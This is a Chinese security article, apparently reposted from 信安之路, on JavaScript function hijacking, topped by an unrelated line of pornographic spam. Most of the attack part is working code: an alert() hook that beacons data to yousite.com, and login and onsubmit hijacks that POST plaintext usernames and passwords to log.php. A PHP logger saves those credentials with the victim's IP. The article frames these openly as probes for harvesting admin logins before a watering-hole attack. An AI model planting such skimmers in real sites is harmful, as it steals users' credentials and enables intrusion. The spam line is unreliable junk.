自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

JavaScript 函數(shù)劫持攻擊原理

安全 網(wǎng)站安全 前端
JavaScript 函數(shù)劫持并不是什么新穎的技術(shù)了。這兩天在和同事吹牛的過程中提到了這個,就簡單地再回顧回顧,以及假想在攻防的運用場景。

JavaScript 函數(shù)劫持并不是什么新穎的技術(shù)了。這兩天在和同事吹牛的過程中提到了這個,就簡單地再回顧回顧,以及假想在攻防的運用場景。

JavaScript 函數(shù)劫持(javascript hijacking)簡介

一個簡單的示例如下,主要邏輯就是,用變量 _alert保存原函數(shù) alert,然后重寫 alert 函數(shù),在重寫的函數(shù)最后調(diào)用原函數(shù)。這樣得到的一個效果就是調(diào)用 alert 的時候,可以往 alert 中加入其它操作。比如如下代碼中進行一個賦值。

  1. <script type="text/javascript"> 
  2.   var _alert = alert; 
  3.   alert = function(){ 
  4.     var str = "啥也不是"
  5.     _alert(str); 
  6.   } 
  7.   alert(); 
  8. </script> 

日志記錄

這種編程技巧常用于開發(fā)中的日志收集與格式化。既然可以劫持函數(shù)加入自己的操作,那么就可以在比較隱蔽的執(zhí)行一些猥瑣的操作。比如:

https://wiki.jikexueyuan.com/project/brief-talk-js/function-hijacking.html

一文中提到的通過 Hook alert 函數(shù)來記錄調(diào)用情況,或者彈一些警告信息,這樣就可以記錄到測試者的網(wǎng)絡(luò)出口ip、瀏覽器指紋等信息也加上,沒準就是日后的呈堂證供。

  1. <script type="text/javascript">   
  2.   function log(s) {   
  3.   var img = new Image();   
  4.   imgimg.style.width = img.style.height = 0;   
  5.   img.src = "http://yousite.com/log.php?caller=" + encodeURIComponent(s);   
  6.   }   
  7.   var _alert = alert;   
  8.   window.alert = function(s) {   
  9.   log(alert.caller);   
  10.   _alert(s);   
  11.   }   
  12. </script>   

探針

在某些場景下,比如:已有權(quán)限,但是數(shù)據(jù)庫中密碼是加密的,無法解開。又或者需要探測目標人員訪問此網(wǎng)站的規(guī)律。此時就可以利用劫持登錄函數(shù)來記錄明文的賬號密碼。如下示例:

onclick 事件會調(diào)用 login 函數(shù)發(fā)送請求包:

  1.     <form id="form1"> 
  2.             <input type="text" id="username" name="username"/><br> 
  3.             <input type="password" id = "password" name="password"/><br> 
  4.             <button id="submit" onclick="login()">submit</button><br> 
  5.         </form> 
  6.         <script> 
  7.             function login(){ 
  8.                 var username = document.getElementById("username").value; 
  9.                 var password = document.getElementById("password").value; 
  10.                 $.ajax({ 
  11.                     url:"login.php", 
  12.                     type:"POST", 
  13.                     data:{ 
  14.                         "username":username, 
  15.                         "password":password 
  16.                     }, 
  17.                     success:function(){ 
  18.                         alert(1); 
  19.                     }, 
  20.                     error:function(){ 
  21.                         alert("error"); 
  22.                     } 
  23.                 }); 
  24.                  
  25.             } 
  26. </script> 

可以劫持 login 函數(shù),在發(fā)送登陸請求前,先發(fā)到探針文件中做一些記錄帳號密碼等操作。

  1. var _login=login; 
  2. login = function (){ 
  3.     var username = document.getElementById("username").value; 
  4.     var password = document.getElementById("password").value; 
  5.     $.ajax({ 
  6.         url:"log.php", 
  7.         type:"POST", 
  8.         data:{ 
  9.             "username":username, 
  10.             "password":password 
  11.         }, 
  12.         success:console.log("1"), 
  13.         error:function(){ 
  14.             alert("error"); 
  15.         } 
  16.     }); 
  17.      

log.php 的內(nèi)容如下:

  1. <?php 
  2. $username = $_POST["username"]; 
  3. $password = $_POST["password"]; 
  4. $ip = $_SERVER['REMOTE_ADDR']; 
  5. file_put_contents("./log.txt",$username." ".$password." ".$ip); 

也許在實際中更常見的表單形式應(yīng)該是下面這種。

  1. <form id="form1" method="POST" action=“login.php”> 
  2.   <input type="text" id="username" name="username"/><br> 
  3.   <input type="password" id = "password" name="password"/><br> 
  4.   <input type="submit" id="submit" name="submit"/><br> 
  5. </form> 

這種表單也可以通過小小的改動,很簡單的記錄到信息,下面使用的是 onsubmit 事件,用如下方式即可:

  1. <script src="http://lib.sinaapp.com/js/jquery/1.7.2/jquery.min.js"> </script> 
  2.     <body> 
  3.         <form id="form1" method="POST" action=“login.php” onsubmit="return _login()"> 
  4.             <input type="text" id="username" name="username"/><br> 
  5.             <input type="password" id = "password" name="password"/><br> 
  6.             <input type="submit" id="submit" name="submit"/><br> 
  7.         </form> 
  8.          
  9.             <script> 
  10.                 function _login(){ 
  11.                     var username = document.getElementById("username").value; 
  12.                     var password = document.getElementById("password").value; 
  13.                     $.ajax({ 
  14.                         url:"log.php", 
  15.                         type:"POST", 
  16.                         data:{ 
  17.                             "username":username, 
  18.                             "password":password 
  19.                         }, 
  20.                         success:true, 
  21.                         error:true 
  22.                     }); 
  23.                 } 
  24. </script> 

不僅可以記錄密碼,還可以結(jié)合前面提到的記錄日志,來記錄管理員的登錄時間、IP、UA 和瀏覽器指紋等信息。這種探針常用于布置水坑攻擊前針對人員登錄情況的信息收集,根據(jù)收集的信息制定具體的水坑方案。 

 

責任編輯:趙寧寧 來源: 信安之路
相關(guān)推薦

2017-03-27 16:08:58

2016-03-16 09:47:55

2022-05-18 08:00:26

函數(shù)劫持JavaScript鉤子函數(shù)

2013-06-21 09:56:26

2010-09-09 20:11:39

2015-05-18 13:51:08

2012-11-19 09:46:59

2019-02-28 05:05:47

2016-09-26 17:15:51

2013-05-14 14:28:55

2010-03-05 09:37:52

2010-09-09 20:26:34

2018-01-09 16:37:46

網(wǎng)絡(luò)劫持HTTPS緩存

2022-08-02 15:05:58

安全帳戶劫持數(shù)據(jù)

2019-06-04 09:14:56

2010-04-21 09:15:21

2017-10-12 15:41:45

2013-05-27 11:07:09

2019-01-02 11:30:30

2014-07-22 13:52:45

點贊
收藏

51CTO技術(shù)棧公眾號